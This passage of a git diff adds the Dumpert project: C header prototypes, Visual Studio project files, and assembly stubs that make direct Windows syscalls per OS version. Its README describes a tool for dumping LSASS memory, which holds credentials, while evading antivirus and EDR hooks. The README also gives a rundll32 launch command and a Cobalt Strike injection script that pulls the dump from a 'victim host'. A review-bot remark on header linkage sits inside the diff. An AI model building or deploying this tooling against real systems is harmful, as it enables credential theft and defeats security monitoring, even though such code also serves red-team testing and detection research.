SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); +EXTERN_C NTSTATUS NtCreateFile7SP1(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); + +// Windows 8 / Server 2012 specific Syscalls +EXTERN_C NTSTATUS NtAllocateVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); +EXTERN_C NTSTATUS NtFreeVirtualMemory80(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); +EXTERN_C NTSTATUS ZwOpenProcess80(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, 
PCLIENT_ID ClientId); +EXTERN_C NTSTATUS ZwClose80(IN HANDLE KeyHandle); +EXTERN_C NTSTATUS ZwWriteVirtualMemory80(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); +EXTERN_C NTSTATUS ZwProtectVirtualMemory80(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); +EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation80(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); +EXTERN_C NTSTATUS NtCreateFile80(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); + + +// Windows 8.1 / Server 2012 R2 specific Syscalls +EXTERN_C NTSTATUS NtAllocateVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); +EXTERN_C NTSTATUS NtFreeVirtualMemory81(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); +EXTERN_C NTSTATUS ZwOpenProcess81(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); +EXTERN_C NTSTATUS ZwClose81(IN HANDLE KeyHandle); +EXTERN_C NTSTATUS ZwWriteVirtualMemory81(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); +EXTERN_C NTSTATUS ZwProtectVirtualMemory81(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); +EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation81(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); +EXTERN_C NTSTATUS 
NtCreateFile81(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); + + +// Windows 10 / Server 2016 specific Syscalls +EXTERN_C NTSTATUS NtAllocateVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, ULONG_PTR ZeroBits, PSIZE_T RegionSize, ULONG AllocationType, ULONG Protect); +EXTERN_C NTSTATUS NtFreeVirtualMemory10(HANDLE ProcessHandle, PVOID *BaseAddress, IN OUT PSIZE_T RegionSize, ULONG FreeType); +EXTERN_C NTSTATUS ZwOpenProcess10(PHANDLE ProcessHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PCLIENT_ID ClientId); +EXTERN_C NTSTATUS ZwClose10(IN HANDLE KeyHandle); +EXTERN_C NTSTATUS ZwWriteVirtualMemory10(HANDLE hProcess, PVOID lpBaseAddress, PVOID lpBuffer, SIZE_T NumberOfBytesToRead, PSIZE_T NumberOfBytesRead); +EXTERN_C NTSTATUS ZwProtectVirtualMemory10(IN HANDLE ProcessHandle, IN PVOID* BaseAddress, IN SIZE_T* NumberOfBytesToProtect, IN ULONG NewAccessProtection, OUT PULONG OldAccessProtection); +EXTERN_C NTSTATUS WINAPI ZwQuerySystemInformation10(SYSTEM_INFORMATION_CLASS SystemInformationClass, PVOID SystemInformation, ULONG SystemInformationLength, PULONG ReturnLength); +EXTERN_C NTSTATUS NtCreateFile10(PHANDLE FileHandle, ACCESS_MASK DesiredAccess, POBJECT_ATTRIBUTES ObjectAttributes, PIO_STATUS_BLOCK IoStatusBlock, PLARGE_INTEGER AllocationSize, ULONG FileAttributes, ULONG ShareAccess, ULONG CreateDisposition, ULONG CreateOptions, PVOID EaBuffer, ULONG EaLength); + +NTSTATUS(*NtAllocateVirtualMemory)( + HANDLE ProcessHandle, + PVOID *BaseAddress, + ULONG_PTR ZeroBits, + PSIZE_T RegionSize, + ULONG AllocationType, + ULONG Protect + ); + +NTSTATUS(*NtFreeVirtualMemory)( + HANDLE ProcessHandle, + PVOID *BaseAddress, + IN OUT PSIZE_T RegionSize, + ULONG FreeType + ); + +NTSTATUS(*ZwOpenProcess)( + PHANDLE 
ProcessHandle, + ACCESS_MASK DesiredAccess, + POBJECT_ATTRIBUTES ObjectAttributes, + PCLIENT_ID ClientId + ); + +NTSTATUS(WINAPI *ZwQuerySystemInformation)( + SYSTEM_INFORMATION_CLASS SystemInformationClass, + PVOID SystemInformation, + ULONG SystemInformationLength, + PULONG ReturnLength + ); + +NTSTATUS(*ZwWriteVirtualMemory)( + HANDLE hProcess, + PVOID lpBaseAddress, + PVOID lpBuffer, + SIZE_T NumberOfBytesToRead, + PSIZE_T NumberOfBytesRead + ); + +NTSTATUS(*ZwProtectVirtualMemory)( + IN HANDLE ProcessHandle, + IN PVOID* BaseAddress, + IN SIZE_T* NumberOfBytesToProtect, + IN ULONG NewAccessProtection, + OUT PULONG OldAccessProtection + ); + +NTSTATUS(*NtCreateFile)( + PHANDLE FileHandle, + ACCESS_MASK DesiredAccess, + POBJECT_ATTRIBUTES ObjectAttributes, + PIO_STATUS_BLOCK IoStatusBlock, + PLARGE_INTEGER AllocationSize, + ULONG FileAttributes, + ULONG ShareAccess, + ULONG CreateDisposition, + ULONG CreateOptions, + PVOID EaBuffer, + ULONG EaLength + ); + +NTSTATUS(*ZwClose)( + IN HANDLE KeyHandle + ); + +typedef NTSTATUS(NTAPI *_RtlGetVersion)( + LPOSVERSIONINFOEXW lpVersionInformation + ); + +typedef void (WINAPI* _RtlInitUnicodeString)( + PUNICODE_STRING DestinationString, + PCWSTR SourceString + ); + +typedef NTSYSAPI BOOLEAN(NTAPI *_RtlEqualUnicodeString)( + PUNICODE_STRING String1, + PCUNICODE_STRING String2, + BOOLEAN CaseInSensitive + ); diff --git a/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj new file mode 100755 index 0000000..8e0f806 --- /dev/null +++ b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj 
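Review bot: The seven function-pointer variables at the end of the header (`NtAllocateVirtualMemory` through `ZwClose`) are definitions, not declarations, so any second translation unit that includes Dumpert.h would get its own copy and the link would depend on the toolchain merging them as common symbols; declare them here as `extern NTSTATUS (*NtAllocateVirtualMemory)(...);` and define each once in Dumpert.c. The parameter names on the write and close prototypes look copied from other calls (`NumberOfBytesToRead` on ZwWriteVirtualMemory, `KeyHandle` on ZwClose, which Dumpert.c passes process and file handles to), which misleads a reader of the header; `NumberOfBytesToWrite` and `Handle` would match their use.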
@@ -0,0 +1,130 @@ + + + + + Debug + Win32 + + + Release + Win32 + + + Debug + x64 + + + Release + x64 + + + + {C7A0003B-98DC-4D57-8F09-5B90AAEFBDF4} + OutflankDumpert + 8.1 + Outflank-Dumpert + + + + Application + true + v140 + MultiByte + + + Application + false + v140 + true + MultiByte + + + Application + true + v140 + MultiByte + + + Application + false + v140 + true + MultiByte + + + + + + + + + + + + + + + + + + + + + + + + Level3 + Disabled + true + + + + + Level3 + Disabled + true + + + + + Level3 + MaxSpeed + true + true + true + MultiThreaded + + + true + true + + + + + Level3 + MaxSpeed + true + true + true + MultiThreaded + + + true + true + false + + + + + + + + + + + + + + + + \ No newline at end of file diff --git a/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters new file mode 100755 index 0000000..269c0e9 --- /dev/null +++ b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.filters @@ -0,0 +1,32 @@ + + + + + {4FC737F1-C7A5-4376-A066-2A32D752A2FF} + cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx + + + {93995380-89BD-4b04-88EB-625FBE52EBFB} + h;hh;hpp;hxx;hm;inl;inc;xsd + + + {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} + rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms + + + + + Source Files + + + + + Header Files + + + + + Source Files + + + \ No newline at end of file diff --git a/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.user b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.user new file mode 100755 index 0000000..6fb136b --- /dev/null +++ b/Dumpert/Outflank-Dumpert/Outflank-Dumpert.vcxproj.user @@ -0,0 +1,4 @@ + + + + \ No newline at end of file diff --git a/Dumpert/Outflank-Dumpert/Syscalls.asm b/Dumpert/Outflank-Dumpert/Syscalls.asm new file mode 100755 index 0000000..86381b9 --- /dev/null +++ b/Dumpert/Outflank-Dumpert/Syscalls.asm 
@@ -0,0 +1,237 @@ +.code + +; Reference: https://j00ru.vexillium.org/syscalls/nt/64/ + +; Windows 7 SP1 / Server 2008 R2 specific syscalls + +ZwOpenProcess7SP1 proc + mov r10, rcx + mov eax, 23h + syscall + ret +ZwOpenProcess7SP1 endp + +ZwClose7SP1 proc + mov r10, rcx + mov eax, 0Ch + syscall + ret +ZwClose7SP1 endp + +ZwWriteVirtualMemory7SP1 proc + mov r10, rcx + mov eax, 37h + syscall + ret +ZwWriteVirtualMemory7SP1 endp + +ZwProtectVirtualMemory7SP1 proc + mov r10, rcx + mov eax, 4Dh + syscall + ret +ZwProtectVirtualMemory7SP1 endp + +ZwQuerySystemInformation7SP1 proc + mov r10, rcx + mov eax, 33h + syscall + ret +ZwQuerySystemInformation7SP1 endp + +NtAllocateVirtualMemory7SP1 proc + mov r10, rcx + mov eax, 15h + syscall + ret +NtAllocateVirtualMemory7SP1 endp + +NtFreeVirtualMemory7SP1 proc + mov r10, rcx + mov eax, 1Bh + syscall + ret +NtFreeVirtualMemory7SP1 endp + +NtCreateFile7SP1 proc + mov r10, rcx + mov eax, 52h + syscall + ret +NtCreateFile7SP1 endp + +; Windows 8 / Server 2012 specific syscalls + +ZwOpenProcess80 proc + mov r10, rcx + mov eax, 24h + syscall + ret +ZwOpenProcess80 endp + +ZwClose80 proc + mov r10, rcx + mov eax, 0Dh + syscall + ret +ZwClose80 endp + +ZwWriteVirtualMemory80 proc + mov r10, rcx + mov eax, 38h + syscall + ret +ZwWriteVirtualMemory80 endp + +ZwProtectVirtualMemory80 proc + mov r10, rcx + mov eax, 4Eh + syscall + ret +ZwProtectVirtualMemory80 endp + +ZwQuerySystemInformation80 proc + mov r10, rcx + mov eax, 34h + syscall + ret +ZwQuerySystemInformation80 endp + +NtAllocateVirtualMemory80 proc + mov r10, rcx + mov eax, 16h + syscall + ret +NtAllocateVirtualMemory80 endp + +NtFreeVirtualMemory80 proc + mov r10, rcx + mov eax, 1Ch + syscall + ret +NtFreeVirtualMemory80 endp + +NtCreateFile80 proc + mov r10, rcx + mov eax, 53h + syscall + ret +NtCreateFile80 endp + +; Windows 8.1 / Server 2012 R2 specific syscalls + +ZwOpenProcess81 proc + mov r10, rcx + mov eax, 25h + syscall + ret +ZwOpenProcess81 endp + +ZwClose81 proc + 
mov r10, rcx + mov eax, 0Eh + syscall + ret +ZwClose81 endp + +ZwWriteVirtualMemory81 proc + mov r10, rcx + mov eax, 39h + syscall + ret +ZwWriteVirtualMemory81 endp + +ZwProtectVirtualMemory81 proc + mov r10, rcx + mov eax, 4Fh + syscall + ret +ZwProtectVirtualMemory81 endp + +ZwQuerySystemInformation81 proc + mov r10, rcx + mov eax, 35h + syscall + ret +ZwQuerySystemInformation81 endp + +NtAllocateVirtualMemory81 proc + mov r10, rcx + mov eax, 17h + syscall + ret +NtAllocateVirtualMemory81 endp + +NtFreeVirtualMemory81 proc + mov r10, rcx + mov eax, 1Dh + syscall + ret +NtFreeVirtualMemory81 endp + +NtCreateFile81 proc + mov r10, rcx + mov eax, 54h + syscall + ret +NtCreateFile81 endp + +; Windows 10 / Server 2016 specific syscalls + +ZwOpenProcess10 proc + mov r10, rcx + mov eax, 26h + syscall + ret +ZwOpenProcess10 endp + +ZwClose10 proc + mov r10, rcx + mov eax, 0Fh + syscall + ret +ZwClose10 endp + +ZwWriteVirtualMemory10 proc + mov r10, rcx + mov eax, 3Ah + syscall + ret +ZwWriteVirtualMemory10 endp + +ZwProtectVirtualMemory10 proc + mov r10, rcx + mov eax, 50h + syscall + ret +ZwProtectVirtualMemory10 endp + +ZwQuerySystemInformation10 proc + mov r10, rcx + mov eax, 36h + syscall + ret +ZwQuerySystemInformation10 endp + +NtAllocateVirtualMemory10 proc + mov r10, rcx + mov eax, 18h + syscall + ret +NtAllocateVirtualMemory10 endp + +NtFreeVirtualMemory10 proc + mov r10, rcx + mov eax, 1Eh + syscall + ret +NtFreeVirtualMemory10 endp + +NtCreateFile10 proc + mov r10, rcx + mov eax, 55h + syscall + ret +NtCreateFile10 endp + +end diff --git a/README.md b/README.md index 60ccd57..144d2f6 100644 --- a/README.md +++ b/README.md 
@@ -1,2 +1,28 @@ -# Dumpert -LSASS memory dumper using direct system calls and API unhooking +### Dumpert, a LSASS memory dumper using direct system calls and API unhooking + +Recent malware research shows that there is an increase in malware that is using direct system calls to evade user-mode API hooks used by security products. +These tools demonstrates the use of direct System Calls and API unhooking and combine these techniques in a proof of concept code which can be used to create a LSASS memory dump using Cobalt Strike, +while not touching disk and evading AV/EDR monitored user-mode API calls. + +Two version of the code are included: + +An executable version and a DLL version of the code. +The DLL version can be run as follow: + +``` +rundll32.exe C:\Dumpert\Outflank-Dumpert.dll,Dump +``` + +Also a sRDI version of the code is provided, including an Cobalt Strike agressor script. +This script uses shinject to inject the sRDI shellcode version of the dumpert DLL into the current process. +Then it waits a few seconds for the lsass minidump to finish and finally download the minidump file from the victim host. + +Compile instructions: + +``` +This project is written in C and assembly. +You can use Visual Studio to compile it from source. +``` + +More info about the used techniques can be found on the following Blog: +The sRDI code can be found here: https://github.com/monoxgas/sRDI \ No newline at end of file